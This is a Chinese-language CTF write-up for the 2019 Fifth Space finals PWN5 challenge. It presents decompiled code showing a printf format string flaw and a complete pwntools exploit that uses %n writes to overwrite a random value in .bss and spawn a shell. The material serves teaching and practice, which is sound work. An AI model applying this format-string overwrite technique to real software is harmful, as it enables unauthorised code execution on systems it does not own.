HugeH4rD

[第五空间2019 决赛]PWN5

Ubuntu 18

0x01

checksec

[*] '/home/zelas/Desktop/pwn/[F Space 2019 sc]PWN5/pwn'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found	//存在保护
    NX:       NX enabled	//栈不可执行
    PIE:      No PIE (0x8048000)

IDA

encrypt()函数

int __cdecl main(int a1)
{
  unsigned int v1; // eax
  int result; // eax
  int fd; // [esp+0h] [ebp-84h]
  char nptr[16]; // [esp+4h] [ebp-80h] BYREF
  char buf[100]; // [esp+14h] [ebp-70h] BYREF
  unsigned int v6; // [esp+78h] [ebp-Ch]
  int *v7; // [esp+7Ch] [ebp-8h]

  v7 = &a1;
  v6 = __readgsdword(0x14u);
  setvbuf(stdout, 0, 2, 0);
  v1 = time(0);
  srand(v1);
  fd = open("/dev/urandom", 0);
  read(fd, &dword_804C044, 4u);
  printf("your name:");
  read(0, buf, 0x63u);	//fmt string 向.bss写入字符串
  printf("Hello,");
  printf(buf);
  printf("your passwd:");
  read(0, nptr, 0xFu);
  if ( atoi(nptr) == dword_804C044 )	//dword_804C044为产生的随机数
  {
    puts("ok!!");
    system("/bin/sh");
  }
  else
  {
    puts("fail");
  }
  result = 0;
  if ( __readgsdword(0x14u) != v6 )
    sub_80493D0();
  return result;
}

//0x0804C044

0x02

思路 fmt string

1.利用read()处向.bss0x0804C044 连续写入4个字节

确定格式化字符串的位置 10

2.发送成功写入的字节数16 hex 0x10

0x03

exp

from pwn import *

context(os='linux', arch='i386', log_level='debug')
path = './pwn'
io = process([path])
# io = remote('node4.buuoj.cn', 26083)

bss_addr = 0x804c044
payload = p32(bss_addr) + p32(bss_addr+1) + p32(bss_addr+2) + p32(bss_addr+3)
payload += b'%10$n%11$n%12$n%13$n'

io.sendlineafter(b'e:', payload)
io.sendlineafter(b'd:', str(0x10101010))

io.interactive()

匿名评论隐私政策

✅ 你无需删除空行，直接评论以获取最佳展示效果

[第五空间2019 决赛]PWN5

0x01

checksec

0x02

0x03

Zelas2Xerath